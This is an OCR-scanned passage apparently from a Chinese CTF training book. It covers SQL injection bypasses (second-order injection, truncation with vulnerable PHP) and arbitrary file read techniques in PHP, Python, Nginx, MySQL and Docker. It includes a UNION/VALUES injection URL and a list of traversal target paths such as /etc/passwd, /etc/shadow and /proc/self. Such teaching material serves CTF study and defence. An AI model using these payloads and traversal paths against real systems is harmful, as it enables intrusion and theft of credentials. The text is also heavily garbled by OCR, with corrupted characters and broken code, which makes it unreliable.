第 1 个 可 控 点 的 肥 和 斜 杠 转 义 了 可 控 点 1 预 置 的 单 引 号 ， 导 任 可 控 点 2 逃 鸳 出 单 引 号 ， 见 图 1-2-48，。 


可 以 看 到 ，sleep( 和 被 成 功 执行 ， 襄 明 可 控 点 2 位 置 已 经 成 功 地 逃逸 引号 。 使 用 UNION 注 入 即 可 获取 繁 
感 信 息 ， 见 图 1 -2-49。 
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图 1-2-49 


1.2.3.2 逃逸 引号 


DN: EV DN En le le EE 
号 、 反 和 斜 杠 等 字符 ， 如 “” 变 为 “^”。 人 在 这 种 情况 下 ， 看 似 不 存在 SQL 注 入 ， 但 在 某 些 条 件 下 仍然 
能 够 被 突破 。 


1. 编码 解码 


开发 者 常常 会 用 到 形 如 urldecode、base64 decode 的 解码 函数 或 者 自 定 义 的 加 解密 函数 。 当 用 户 输 

入 addslashes 函 数 时 ， 数 据 处 于 编码 状态 ， 引 号 无 法 被 转 义 ， 解 码 后 如 果 直 接 进入 SQL 语句 即 可 造成 

注入 ， 同 样 的 情况 也 发 生 在 加 密 /解密 、 字 符 集 转换 的 情况 。 宽 字 节 注入 就 是 由 字符 集 转 换 而 发 生 注入 

的 经 典 案 例 ， 读 者 如 感 兴趣 ， 可 自行 查询 相关 文档 了 解 。 

2 . 意料 之 外 的 输入 点 

开发 者 在 转 义 用 户 输 入 时 遗漏 了 一 些 可 控 点 ， 以 PHP 为 例 ， 形 如 上 传 的 文件 名、http header、 re 
MN 

3. 二 次 注入 

二 次 注入 的 根源 在 于 ， 开 发 者 信任 数据 库 中 取出 的 数据 是 无 害 的 。 假 设 当 前 数据 表 见 图 1-2-50， 用 户 

输入 的 用 户 名 admin'or 1 经 过 转 义 为 了 adminN omN'1， 于 是 SQL 语句 为 : 


INSERT INTO wp_user VALUES(2, ' admin\'or\'1', 'some_pass'); 


此 时 ， 由 于 引号 被 转 义 ， 并 没有 注入 产生 ， 数 据 正常 入 库 ， 见 图 1-2-51。 


图 1-2-50 





图 1-2-51 
但 是 ， 当 这 个 用 户 名 再 次 被 使 用 时 (通常 为 session 信 息 ) ， 如 下 代码 所 示 : 


<?php 

$conn = mysqli_connect("127.0.0.1", "root", "root", "test"); 

$res = mysqli_query($conn, "SELECT username FROM wp_user WHERE id=2"); 

$row = mysqli_fetch_array($res); 

$name = $row["username"] 

$res = mysqli_query($conn, "SELECT password FROM wp_user WHERE username='$name'"); 
?> 


当 name 进 入 SQL 语句 后 ， 变 为 


SELECT password FROM wp_user WHERE username = 'admin'or'1'; 


从 而 半生 主 信 < 
4. 字符 串 截断 
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在 标题 、 抬 头等 位 置 ， 开 发 者 可 能 限定 标题 的 字符 不 能 超过 10 个 字符 ， 超 过 则 会 被 截断 。 例 如 ，PHP 
代码 如 下 : 


p 

$conn = mysqli_connect("127.0.0.1", "root", "root", "test"); 
$title = addslashes($_GET['title']); 

$title = substr($titlel, 0, 10); 


echo "<center>$title</center>"; 
$content = addslashes($_GET['content']); 
$sql = "INSERT INTO wp_news VALUES(2, '$title', '$content')"; 
$res = mysqli_query($conn, $sql); 
> 


假设 攻击 者 输入 “aaaaaaaaa'”， 目 动 转 义 为 “aaaaaaaaa\"”， 由 于 字符 长 度 限 制 ， 被 截取 为 “ 

\”， 正 好 转 义 了 预 置 的 单 引号 ， 这 样 在 content 的 地 方 即 可 注入 。 我 们 采取 VALUES 注 入 
的 方法 ， 访 问 httpX/192.168.20.132/insert2.php? title=aaaaaaaaaN&content=，1，1) ， 
(3，4， (select%20pwd9%20from9%20wp user%z20limit%201) ，1) %23， 即 可 看 到 数据 表 
wp_news 新 增 了 2 行 ， 见 图 1-2-52。 


aaaaaaaa 


图 1=2-52 


1.2.4 注入 的 功效 


前 面 讲述 了 SQL 注 入 的 基础 和 绕 过 的 万 法 ， 那 么 ， 注 入 到 底 有 什么 用 呢 ? 结 合作 者 的 实战 经 验 ， 忆 结 
如 下 。 


学 在 有 写 文 件 权 限 的 情况 下 ， 直 接 用 INTO OUTFILE 或 者 DUMPFILE 向 Web 目 录 写 文件 , 或 
者 写 文 件 后 结合 文件 包含 漏洞 达到 代码 执行 的 效果 ， 见 图 1-2-53。 


学 企 有 读 文件 权限 的 情况 下 ， 用 load _file() 遂 数 读 取 网 站 源码 和 配置 信息 ， 获 取 敏 感 数据 。 


学 提升 权限 ， 获 得 更 高 的 用 户 权 限 或 者 管理 员 权 限 ， 绕 过 登录 ， 添 加 用 尸 ， 调 整 用 户 权 限 
等 ， 从 而 拥有 更 多 的 网 站 功能 。 


学 通过 注入 控制 数据 库 查 询 出 来 的 数据 ， 控 制 如 模板 、 缓 存 等 文件 的 内 容 来 获取 权限 ， 或 者 
删除 、 读 取 菏 些 天 键 文件 。 


学 在 可 以 执行 多 语句 的 情况 下 ， 控 制 整个 数据 库 ， 包 括 控制 任意 数据 、 任 意 字 段 长 度 等 。 


学 在 SQL Server 这 类 数据 库 中 可 以 直接 执行 系统 命令 。 


uP 


图 1-2-53 


1.2.5 SQL 注入 小 结 


本 节 仪 选用 了 CTF 中 最 简单 的 一 些 考 点 进行 了 简介 ， 而 实际 比赛 中 会 将 很 多 的 特性 、 消 数 进 行 结合 。 | 
注入 类 的 MySQL 题 目 中 可 以 采用 的 过 滤 方 法 多 种 多 样 ， 同 时 由 于 SQL 服务 器 在 实现 时 的 不 同 ， 即 
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ES SE = DN 
扩 巧 作为 考点 。 那 么 ， 为 了 做 出 题目 或 更 深入 了 解 SQL 注 入 原理 ， 最 关键 的 是 根据 不 同 的 SQL 服务 器 
类 型 ， 耕 找 相 天 资料 ， 通 过 fuzz 得 出 伞 过 滤 挥 的 字符 、 函 数 、 天 键 词 等 ， 在 文档 中 至 找 功 能 相同 但 不 
包含 过 滤 特 征 的 奉 代 品 ， 最 终 完 成 对 相关 防御 功能 的 绕 过 。 


此 外 ， 平 时 多 积累 、 多 练习 也 会 很 有 帮助 ， 一 些 平 台 如 sqli-labs (https://github.com/Audi-1/ 

、 RN 

-labs) 提供 不 同 过 滤 等 级 下 的 注入 题目 ， 其 中 涵盖 了 大 多 数 出 题 点 。 我 们 通过 练习 、 上 总结， 在 比赛 
中 总 会 能 找到 需要 的 组 合 方式 ， 最 终 解 决 题目 。 
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1.3 任意 文件 读 取 凋 洞 


所 谓 文件 读 取 漏 洞 ， 融 是 攻击 者 通过 一 些 手段 可 以 读 取 服 务 器 上 开 友 者 不 允许 读 到 的 文件 。 从 整个 攻 
击 过 程 来 看 ， 它 常常 作为 资产 信息 搜集 的 一 种 强力 的 补充 手段 ， 服 务 器 的 各 种 配置 文件 、 文 件 形式 存 
储 的 密 钥 、 服 务 器 信息 (包括 正在 执行 的 进程 信息 ) 、 历 史 命 令 、 网 络 信 息 、 应 用 源码 及 二 进 制程 序 
都 在 这 个 漏洞 触发 点 被 攻击 者 帘 探 。 


文件 读 取 漏 洞 弟弟 意味 着 被 攻击 者 的 服务 器 即将 被 攻击 者 彻底 控制 。 当 然 ， 如 果 服 务 器 严格 按照 标准 
的 安全 规范 进行 部 署 ， 即 使 应 用 中 存在 可 利用 的 文件 读 取 漏洞 ， 攻 击 者 也 很 难 拿 到 有 价值 的 信息 。 文 
件 读 取 漏洞 在 每 种 可 部 署 Web 应 用 的 程序 语言 中 几乎 都 存在 。 当 然 ， 此 处 的 “存在 ”本 质 上 不 是 语言 
本 身 的 问题 ， 而 是 开发 者 在 进行 开发 时 由 于 对 意外 情况 考虑 不 足 所 产生 的 跑 漏 。 


通常 来 讲 ，Web 应 用 框架 或 中 间 件 的 开发 者 十 分 在 意 代 码 的 可 复 用 性 ， 因 此 对 一 些 API 接 口 的 定义 都 
十 分 开放 ， 以 求 尽 可 能 地 给 二 次 开发 者 最 大 的 自由。 而 真实 情况 下 ,许多 开发 人 员 在 进行 二 次 开发 时 
过 于 信任 Web 应 用 框架 或 中 间 件 底层 所 实现 的 安全 机 制 ， 在 未 仔细 了 解 应 用 框架 及 中 间 件 对 应 的 安全 
机 制 的 情况 下 ， 便 轻率 地 依据 简单 的 API 文 档 进行 开发 ， 不 巧 的 是 ，Web 应 用 框架 或 中 间 件 的 开发 者 
可 能 未 在 文档 中 标注 出 API 函 数 的 具体 实现 原理 和 可 接受 参数 的 学 围 、 可 预料 到 的 安全 问题 等 。 


业界 公认 的 代码 库 通常 被 称 为 “轮子 ”， 程序 可 以 通过 使 用 这 些 “ 轮 子 ” 极 大 地 减少 重复 工作 量 。 如 
果 “ 轮 子 ”中 存在 漏洞 ， 在 “轮子 ”代码 被 程序 员 多 次 迭代 复 用 的 同时 ， 漏 洞 也 将 一 级 一 级 地 传递 ， 
而 随 着 对 底层 “轮子 ”代码 的 不 断 引 用 ， 存 在 于 “轮子 ”代码 中 的 安全 隐患 对 于 处 在 “调用 链 ” 顶 映 
的 开 友 者 而 言 几乎 接近 透明 。 


对 于 挖掘 Web 应 用 框架 漏洞 的 安全 人 员 来 说 ， 能 人 否 耐心 对 这 条 “调用 链 ” 逆 向 追根 溯源 也 是 一 个 十 分 
严峻 的 挑战 。 


另外 ， 有 一 种 任意 文件 读 取 漏洞 是 开发 者 通过 代码 无 法 控制 的 ， 这 种 情况 的 漏洞 常常 由 Web Server 
自身 的 问题 或 不 安全 的 服务 器 配置 导致 。Web Server 运 行 的 基本 机 制 是 从 服务 器 中 读 取 代码 或 资源 
文件 ,再 把 代码 类 文件 传送 给 解释 器 或 CGl 程 序 执行 ， 然 后 将 执行 的 结果 和 资源 文件 反馈 给 客户 端 用 
尸 ， 而 存在 于 其 中 的 众多 文件 操作 很 可 能 被 攻击 者 干预 ， 进 而 造成 诸如 非 预 期 读 取 文件 、 错 误 地 把 代 
EDIE 


1.3.1 文件 读 取 漏 洞 弟 见 触 友 操 


1.3.1.1 Web 语 言 


不 同 的 Web 语 言 ， 其 文件 读 取 漏洞 的 触发 点 也 会 存在 差异 ， 本 小 节 以 读 取 不 同 Web 文 件 漏洞 为 例 进 
行 介绍 ， 具 体 的 漏洞 场景 请 读者 自行 查阅 ， 在 此 不 骨 袭 述 。 


1. PHP 


PHP 标 准 函数 中 有 关 文 件 读 的 部 分 不 再 详细 介绍 ， 这 些 函 数 包括 但 可 能 不 限于 : file get_contents 
()、file()、fopen0 函 数 (及 其 文件 指针 操作 消 数 fread()、fgets() 等 )， 与 文件 包 合 相关 的 冰 数 ( 

()、require()、include once()、require once() 等 ) ， 以 及 通过 PHP 读 文件 的 执行 系统 命令 
(System()、exec() 等 ) 。 这 些 函 数 在 PHP 应 用 中 十 分 常见 ， 所 以 在 整个 PHP 代 码 审计 的 过 程 中 ， 这 
些 函 数 会 被 审计 人 员 重 点 天 注 。 
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这 里 有 些 读 者 或 许 有 疑问 ， 既 然 这 些 消 数 这 么 危险 ， 为 什么 开发 者 还 要 将 动态 输入 的 数据 作为 参数 传 
递 给 它们 呢 ? 因 为 现在 PHP 开 发 技术 越 来 越 倾向 于 单 入 口 、 多 层级 、 多 通道 的 模式 ， 其 中 涉及 PHP 文 
件 之 间 的 调用 密集 是 频 繁 。 开 发 者 为 了 写 出 一 个 高 复 用 性 的 文件 调用 函数 ， 就 需要 将 一 些 动态 的 信息 
传 入 (如 可 变 的 部 分 文件 名 ) 那些 函数 ( 见 图 1-3-1) ， 如 果 在 程序 入 口 处 没有 利用 switch 等 分 支 语 
句 对 这 些 动态 输入 的 数据 加 以 控制 ， 攻 击 者 融 很 容易 注入 恶意 的 路 径 ， 从 而 实现 任意 文件 读 取 甚 全 任 
意 文件 包 合 。 


public static function registerComposerLoader($composerPath) 
{ 
if (is_file($composerPath . 'autoload namespaces.php')) { 
$map = require $composerPath . 'autoload_ namespaces.php'; 
foreach ($map as $namespace => $path) { 
self::addPsr0 ($namespace, $path); 
} 
} 
if (is_file($composerPath , 'autoload_psr4.php')) { 
$map = require $composerPath . 'autoload_psr4.php'; 
foreach ($map as $namespace => $path) { 
self::addPsr4($namespace, $path); 
} 
} 
if (is_file($composerPath . 'autoload_classmap.php')) { 
$classMap = require $composerPath . 'autoload_classmap.php'; 
if ($classMap) { 
self::addClassMap( $classMap); 
} 
} 


图 1-3-1 
除了 上 面 提 到 的 标准 库 函 数 ， 很 多 弟 见 的 PHP 扩 展 也 提供 了 一 些 可 以 读 取 文 件 的 函数 。 例 如 ，php- 
扩展 (文件 内 容 作 为 HTTP body) 涉及 文件 存 取 的 库 (如 数据 库 相 关 扩 展 、 图 片 相关 扩展 ) 、 
模块 造成 的 XXE 等 。 这 些 通 过 外 部 库 消 数 进行 任意 文件 读 取 的 CTF 题 目 不 是 很 多 ， 后 续 草 忆 会 对 涉及 
的 题目 进行 实例 分 析 。 


与 其 他 语言 不 同 ，PHP 向 用 户 提 供 的 指定 待 打 开 文 件 的 方式 不 是 简 简单 单 的 一 个 路 径 ， 而 是 一 个 文件 
流 。 我 们 可 以 将 其 简单 理解 成 PHP 提 供 的 一 套 协 议 。 例 如 ， 在 浏览 器 中 输入 http://host: port/xxx 
后 ， 就 能 通过 HTTP 请 求 到 远程 服务 器 上 对 应 的 文件 ， 而 在 PHP 中 有 很 多 功能 不 同 但 形式 相似 的 协 
议 ， 统 称 为 Wrapper， 其 中 最 具 特 色 的 协议 便 是 php:// 协 议 ， 更 有 趣 的 是 ，PHP 提 供 了 接口 供 开发 者 
编写 自 定 义 的 wrapper (stream wrapper register) 。 


除了 Wrapper，PHP 中 另 一 个 具有 特色 的 机 制 是 Filter， 其 作用 是 对 目前 的 Wrapper 进 行 一 定 的 处 理 
(如 把 当前 文件 流 的 内 容 全 部 变 为 大 写 ) 。 


对 于 目 定 义 的 Wrapper 而 言 ，Filter 需 要 开发 者 通过 stream filter _ register 进行 注册 。 而 PHP 内 置 的 
一 些 Wrapper 会 自 带 一 些 Filter， 如 php:VW 协 议 存 在 图 1-3-2 中 所 示 类 型 的 Filter。 


List of Avallable Filters 


Table of Contents 


EE EEE 


。 String Filters 


e。 Conversion Filters 


https://weread.qq.com/web/reader/77d32500721a485577d8eeek65132ca01b6512bd43d90e3 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 


本 COMTIDTESSION Fters 
。 Encryption Filters 
图 1-3-2 
PHP 的 Filter 特 性 给 我 们 进行 任意 文件 读 取 提供 了 很 多 便利 。 假 设 服务 端 include 函 数 的 路 径 参 数 可 
控 ， 正 常情 况 下 它 会 将 目标 文件 当 作 PHP 文 件 去 解析 ， 如 果 解析 的 文件 中 存在 “<? php” 等 PHP 的 
相关 标签 ， 那 么 标签 中 的 内 容 会 被 作为 PHP 代 码 执行 。 


我 们 如 果 直 接 将 这 种 含有 PHP 代 码 的 文件 的 文件 名 传 入 include 函 数 ， 那么 由 于 PHP 代 码 被 执行 而 无 
法 通过 可 视 文 本 的 形式 泄露 。 但 这 时 可 以 通过 使 用 Filter 避 免 这 种 情况 的 发 生 。 


例如 ， 比 较 常 见 的 Base64 相 关 的 Filter 可 将 文件 流 编码 成 Base64 的 形式 ， 这 样 读 取 的 文件 内 容 中 就 不 
会 存在 PHP 标 签 。 而 更 严重 的 是 ， 如 果 服 务 端 开 启 了 远程 文件 包含 选项 allow_url include,， 我 们 就 可 
以 直接 执行 远程 PHP 代 码 。 


当然 ， 这 些 PHP 默 认 扒 带 的 Wrapper 和 Filter 都 可 以 通过 php.ini 莹 用 ， 读 者 在 实际 遇 到 时 要 具体 分 
析 ， 建 议 阅读 PHP 有 关 Wrapper 和 Filter 的 源 代 码 ， 会 更 加 深入 理解 相关 内 容 。 


在 遇 到 的 有 关 PHP 文 件 包含 的 实际 问题 中 ， 我 们 可 能 遇 到 三 种 情况 : @ 文 件 路 径 前 面 可 控 ， 后 面 不 可 
控 ; @ 文 件 路 径 后 面 可 控 ， 前 面 不 可 控 ; @@ 文 件 路 径 中 间 可 控 。 


对 于 第 一 种 情况 ， 在 较 低 的 PHP 版 本 及 容器 版 本 中 可 以 使 用 “\x00” 截 断 ， 对 应 的 URL 编 码 是 “% 
”。 当 服务 端 存 在 文件 上 传 功能 时 ， 也 可 以 尝试 利用 zip 或 phar 协 议 直 接 进行 文件 包 合 进 而 执行 PHP 
代码 。 


对 于 第 二 种 情况 ， 我 们 可 以 通过 符号 “../” 进 行 目录 穿越 来 直接 读 取 文件 ， 但 这 种 情况 下 无 法 使 用 
。 如 果 服 务 端 是 利用 include 等 文件 包含 类 的 函数 ， 我 们 将 无 法 读 取 PHP 文 件 中 的 PHP 代 码 。 


第 三 种 情况 与 第 一 种 情况 相似 ， 但 是 无 法 利用 Wrapper 进 行文 件 包含 。 


2. Python 


与 PHP 不 同 的 是 ，Python 的 Web 应 用 更 多 地 倾向 于 通过 其 自身 的 模块 启动 服务 ， 同 时 搭配 中 间 件 、 
代理 服务 将 整个 Web 应 用 呈现 给 用 户 。 用 户 和 Web 应 用 交互 的 过 程 本 身 就 包含 对 服务 器 资源 文件 的 
请 求 ， 所 以 容易 出 现 非 预期 读 取 文件 的 情况 。 因 此 ， 我 们 看 到 的 层出不穷 的 Python 某 框架 任意 文件 读 
取 漏 洞 也 是 因为 缺乏 统一 的 资源 文件 交互 的 标准 。 


漏洞 经 常 出 现在 框架 请 求 静 态 资 源 文件 部 分 ， 也 就 是 最 后 读 取 文 件 内 容 的 open 函 数 ， 但 直接 导致 漏 
洞 的 成 因 往 往 是 框架 开发 者 忽略 了 Python 国 数 的 feature， 如 os.path.join(0 阔 数 : 


>>> os.path. join("/a","/b") 
Ab 


很 多 开发 者 通过 判断 用 户 传 入 的 路 径 不 包含 “.” 来 保证 用 户 在 读 取 资 源 时 不 会 此 生 目 录 穿 越 ， 随 后 将 
用 户 的 输入 代入 os.path.join 的 第 二 个 参数 ， 但 是 如 果 用 户 传 入 “/”， 则 依然 可 以 穿越 到 根 目 录 ， 进 
导致 任意 文件 读 取 。 这 是 一 个 值得 我 们 注意 并 深思 的 地 方 。 


除了 python 框 架 容 易 出 这 种 问题 ， 很 多 涉及 文件 操作 的 应 用 也 很 有 可 能 因为 滥用 open 阔 数 、 模 板 的 
不 当 泻 染 导 致 任意 文件 读 取 。 比 如 ， 将 用 户 输 入 的 某 些 数据 作为 文件 名 的 一 部 分 (常见 于 认证 服务 或 
者 日 志 服务 ) 存储 在 服务 器 中 ， 在 取 文 件 内 容 的 部 分 也 通过 将 经 过 处 理 的 用 户 输 入 数据 作为 索引 去 查 
找 相 关 文 件 ， 这 束 给 了 攻击 者 一 个 进行 目录 穿越 的 途径 。 


例如 ，CTF 线 上 比赛 中 ，Python 开 发 者 调用 不 安全 的 解压 模块 进行 压缩 文件 解压 ， 而 导致 文件 解压 后 
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可 进行 目录 穿越 。 当 然 ， 解 讨 文 件 时 的 目录 穿越 的 危害 是 履 写 服务 器 已 有 文件 。 


男 一 种 情况 是 攻击 者 构造 软 链接 放 入 压缩 包 ， 解 压 后 的 内 容 会 直接 指向 服务 器 相应 文件 ， 攻 击 者 访问 
解压 后 的 链接 文件 会 返回 链接 指向 文件 的 相应 内 容 。 这 将 在 后 面 章 节 中 详细 分 析 。 与 PHP 相 同 ， Sn 
的 一 些 模块 可 能 存在 XXE 读 文件 的 情况 。 


此 外 ，Python 的 模板 注入 、 反 序列 化 等 漏洞 都 可 造成 一 定 程度 的 任意 文件 读 取 ， 当 然 ， 其 最 大 危害 仍 
然 是 导致 任意 命令 执行 。 
3. Java 


除了 Java 本 身 的 文件 读 取 立 数 FilelInputStream、XXE 导 致 的 文件 读 取 ，Java 的 一 些 模块 也 支持 “ 
://” 协 议 ， 这 是 Java 应 用 中 出 现任 意 文件 读 取 最 多 的 地 方 ， 如 Spring Cloud Config server 路 径 字 
越 与 任意 文件 读 取 漏洞 (CVE-2019-3799) 、Jenkins 任 意 文件 读 取 漏洞 (CVE-2018-1999002) 
等 。 


4. Ruby 


在 CTF 线 上 比赛 中 ，Ruby 的 任意 文件 读 取 漏洞 通常 与 Rails 框 架 相关 。 到 目前 为 止 ， 我们 已 知 的 通用 漏 

洞 为 Ruby On Rails 远 程 代 码 执行 漏洞 (CVE-2016-0752) 、Ruby On Rails 路 径 穿越 与 任意 文件 读 

取 漏 洞 (CVE-2018-3760) 、Ruby On Rails 路 径 穿 越 与 任意 文件 读 取 漏洞 (CVE-2019-5418) 。 
里 到 Ruby On Rails 远 程 代码 执行 漏洞 (CVE-2016-0752) 的 利用 。 


5. Node 


目前 ， 已 知 Node.js 的 express 模 块 曾 存在 任意 文件 读 取 漏 洞 (CVE-2017-14849) ， 但 笔者 还 未 遇 到 
相关 CTF 赛 题 。CTF 中 Node 的 文件 读 取 漏 洞 通 单 为 模板 注入 、 代 码 注入 等 情况 。 


1.3.1.2 中 间 件 /服务 器 相关 


不 同 的 中 间 件 /服务 器 同样 可 能 存在 文件 读 取 漏洞 ， 本 节 以 曾经 出 现 的 不 同 中 间 件 /服务 器 上 的 文件 读 
取 漏 洞 为 例 来 介绍 。 具体 的 漏洞 } 景 请 读者 自 了 得 阅 ， 在 此 不 再 玖 述 。 


1. Nginx 错 误 配 置 


Nginx 错 误 配 置 导 致 的 文件 读 取 漏洞 在 CTF 线 上 比赛 中 经 常 出 现 ， 尤 其 是 经 常 搭配 Python-Web 应 用 
一 起 出 现 。 这 是 0 -Web 反 向 代理 的 最 佳 实 现 。 然 而 它 的 配置 文件 如 果 配 
置 和 错误， 残 容 易 造 成 严重 问题 。 例 如 : 


Location /static { 
alias /home/myapp/static/; 
} 


如 果 配 置 文件 中 包含 上 面 这 段 内 容 ， 很 可 能 是 运 维 或 者 开发 人 员 员 想 量 让 用 户 可 以 访问 static 目 录 (一 般 
是 静态 资源 目录 ) 。 但 是 ， 如 果 用 户 请 求 的 Web 路 径 是 /static../， 拼 接 到 alias 上 就 变 成 了 /home/ 

/static/./， 此 时 便 会 产生 目录 穿越 漏洞 ， 并 且 穿 越 到 了 myapp 目 录 。 这 时 ， 攻 击 者 可 以 任意 
下 载 Python 源 代码 和 字 节 人 码 文件 。 注 意 : 漏洞 的 成 因 是 location 最 后 没有 加 “/” 限 制 ，Nginx 匹 配 
到 路 径 static 后 ， 把 其 后 面 的 内 容 拼 接 到 alias， 如 果 传 入 的 是 /static../，Nginx 并 不 认为 这 是 跨 目 
录 ， 而 是 把 它 当 作 整个 目录 名 ， 所 以 不 会 对 它 进行 跨 目 录 相 天 处 理 。 


yapp 


2. 数据 库 


可 以 进行 文件 读 取 操作 的 数据 库 很 多 ， 这 里 以 MySQL 为 例 来 进行 说 明 。 
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MySQL 的 load file(0 国 数 可 以 进行 文件 读 取 ， 但 是 load file() 函 数 读 取 文 件 首先 需要 数据 库 配 置 FILE 
权限 (数据 库 rooti 用 户 一 般 都 有 ) ， 其 次 需要 执行 load _file() 遂 数 的 MySQL 用 户 / 用 户 组 对 于 目标 文 
件 具 有 可 读 权限 (很 多 配置 文件 都 是 所 有 组 /用 户 可 读 ) ， 主 流 Linux 系 统 还 需要 Apparmor 配 置 目录 
日 名 单 (默认 日 名 单 限制 在 MySQL 相 关 的 目录 下 ) ， 可 谓 “一 流 三 折 ”。 即 使 这 么 严格 的 利用 条 件 ， 
我 们 还 是 经 常 可 以 在 CTF 线 上 比赛 中 遇 到 相关 的 文件 读 取 题 。 


还 有 一 种 方式 读 取 文件 ， 但 是 与 load file(0 文 件 读 取 函 数 不 同 ， 这 种 方式 需要 执行 完整 的 SQL 语句 ， 
即 load data infile。 同 样 ， 这 种 方式 需要 FILE 权 限 ， 不 过 比较 少见 ， 因 为 除了 SSRF 攻 击 MySQL 这 种 
特殊 情形 ， 很 少 有 可 以 直接 执行 整 条 非 基 本 SQL 语 句 (除了 SELECT/UPDATE/INSERT) 的 机 会 。 
CY 


bash 命 令 In-s 可 以 创建 一 个 指向 指定 文件 的 软 链 接 文件 ， 然 后 将 这 个 软 链 接 文件 上 传 至 服务 器 ， 当 我 
们 再 次 请 求 访问 这 个 链接 文件 时 ， 实 际 上 是 请 求 在 服务 端 它 指向 的 文件 。 


4. FFmpeg 


2017 年 6 月 ，FFmpeg 被 爆 出 存在 任意 文件 读 取 漏洞 。 同 年 的 全 国 大 学 生 信 息 安全 竞赛 实践 赛 Ca 
) 束 利 用 这 个 漏洞 出 了 一 道 CTF 线 上 题目 〈 相 天 题解 可 以 参考 https://www.cnblogs.com/. 
ET 
/articles/2017 quanguo ctf web writeup.html) 。 y 


5.Docker-API 


Docker-API 可 以 控制 Docker 的 行为 ， 一 般 来 说 ，Docker-API 通 过 UNIX Socket 通 信 ， 也 可 以 通过 

直接 通信 。 当 我 们 遇见 SSRF 漏 洞 时 ， 尤 其 是 可 以 通过 SSRF 漏 洞 进行 UNIX Socket 通 信 的 时 候 ， 惑 
可 以 通过 操纵 Docker-API 把 本 地 文件 载 入 Docker 新 容器 进行 读 取 (利用 Docker 的 ADD、COPY 操 
作 ) ， 从 而 形成 一 种 另类 的 任意 文件 读 取 。 


1.3.1.3 客户 端 相关 
客 尸 新 也 存在 文件 读 取 漏 间 ， 大 多 是 基于 XSS 漏 洞 读 取 本 地 文件 。 
1. 浏览 器 /Flash XSS 


一 般 来 癌 ， 很 多 浏览 器 会 禁止 JavaScript 代 码 读 取 本 地 文件 的 相关 操作 ， 如 请 求 一 个 远程 网 站 ， 如 果 
它 的 JavaScript 代 码 中 使 用 了 File 协 议 读 取 客 尸 的 本 地 文件 ， 那 么 此 时 会 由 于 同 源 策略 导致 读 取 失败 。 
但 在 浏览 器 的 发 展 过 程 中 存在 着 一 些 操作 可 以 绕 过 这 些 措施 ， 如 Safari 浏 宽 器 在 2017 年 8 月 被 爆 出 存 
在 一 个 客 己 端的 本 地 文件 读 取 漏洞 。 


2 .MarkDowni 语 法 解析 器 XSS 


与 XSS 相 似 ，Markdown 解 析 器 也 具有 一 定 的 解析 JavaScript 的 能 力 。 但 是 这 些 解 析 器 大 多 没有 像 浏 
哆 器 一 样 对 本 地 文件 读 取 的 操作 进行 限制 ， 很 少 有 与 同 源 策 略 类 似 的 防护 措施 。 


1.3.2 文件 读 取 漏洞 弟 见 读 取 路 径 


1.3.2.1 Linux 


1. flag 名 称 (相对 路 径 ) 
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比赛 过 程 中 ， 有 时 fuzz 一 下 flag 名 称 便 可 以 得 到 答案 。 注 意 以 下 文件 名 和 后 缀 名 ， 请 读者 根据 题目 及 
环 卉 目 行 友 挥 。 

Sy EY A /SE J /AY A (Rh | pvelepVE 
flag(.txt|.php| .pyc| .py …) 


[dir_you_know]/flag(.txt|.php| .pyc| .py …) 
,1.1/../../../../../../../etc/fLag(.txt|.php|1.pycl1.py …) 


fy/ 
.txt| .php| . 
人 
此 

pa 


2 . 服务 器 信息 (绝对 路 径 ) 


下 面 列 出 CTF 线 上 比赛 单 见 的 部 分 需 知 目录 和 文件 。 建 议 读者 在 阅读 本 书后 杀 目 翻 看 这 些 目 录 ， 
未 列 出 的 文件 也 建议 了 解 一 二 。 


/d= 
/etc 目 录 下 多 是 各 种 应 用 或 系统 配置 文件 ， 所 以 其 下 的 文件 是 进行 文件 读 取 的 首要 目标 。 
(2)/etc/passwd 


/etc/passwd 文 件 是 Linux 系 统 保存 用 户 信 息 及 其 工作 目录 的 文件 ， 权 限 是 所 有 用 户 / 组 可 读 ， 一般 被 
用 作 Linux 系 统 下 文件 读 取 漏洞 存在 性 判断 的 基准 。 读 到 这 个 文件 我 们 束 可 以 知道 系统 存在 哪些 用 
户 、 他 们 所 属 的 组 是 什么 、 工 作 目录 是 什么 。 


(3)/etc/shadow 


/etc/shadow 是 Linux 系 统 保 存 用 户 信息 及 (可 能 人 存在 ) 密码 (hash) 的 文件 ， 权 限 是 root 用 户 可 读 
写 、shadow 组 可 读 。 所 以 一 般 情况 下 ， 这 个 文件 是 不 可 读 的 。 


(4)/etc/apache2/* 


/etc/apache2/* 是 Apache 配 置 文件 ， 可 以 获知 Web 目 录 、 服 务 端 口 等 信息 。 
者 确认 Web 路 径 。 


(5)/etc/nginx/* 
/etcnginx/* 是 Nginx 配 置 文件 (Ubuntu 等 系统 ) ， 可 以 获知 Web 目 录 、 服 务 端 口 等 信息 。 
(6)/etc/apparmor(.d)/* 


/etcapparmor (.d) /* 是 Apparmor 配 置 文件 ， 可 以 获知 各 应 用 系统 调用 的 日 名 单 、 黑 名 单 。 例 
如 ， 通 过 读 配 置 文件 但 看 MySQL 是 否 禁 止 了 系统 调用 ， 从 而 确定 是 否 可 以 使 用 UDF (User Defined 


Functions) 执行 系统 命令 。 
(7)/etc/(cron.d/*|crontab) 


/etc/ (cron.d/*|crontab) 是 定时 任务 文件 。 有 些 CTF 题 目 会 设置 一 些 定 时 任务 ， 读 取 这 些 配置 文件 
就 可 以 友 现 隐藏 的 目录 或 其 他 文件 。 


(8)/etc/environment 


/etc/environment 是 环境 变量 配置 文件 之 一 。 环 境 变 量 可 能 存在 大 量 目录 信息 的 港 露 ， 甚 至 可 能 出 现 
secret key 漠 露 的 情况 。 


CAAale tl 
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/etc/hostname 表 示 主 机 名。 


(GO) IAA 


/et/hosts 是 主机 名 查询 静态 表 ， 包 含 指定 域名 解析 IP 的 成 对 信息 。 通 过 这 个 文件 ， 参 赛 者 可 以 探测 
网 卡 信息 和 内 网 IP/ 域 名 。 


(11)/etc/issue 

/etc/issue 指 明 系 统 版 本 。 
(12)/etc/mysql/* 

/etc/mysql/* 是 MySQL 配 置 文件 。 

(13)/etc/php/* 

/etc/php/* 是 PHP 配 置 文 件 。 
(14) /proc 目 录 


/proc 目 录 通 常 存储 着 进程 动态 运行 的 各 种 信息 ， 本 质 上 是 一 种 虚拟 目录 。 注 意 : 如 果 查 看 非 当 前 进 
程 的 信息 ，pid 是 可 以 进行 暴力 破解 的 ， 如 果 要 查看 当前 进程 ， 只 需 /proc/self/ 代 蔡 /proc/[pid]/ 即 
pj, 


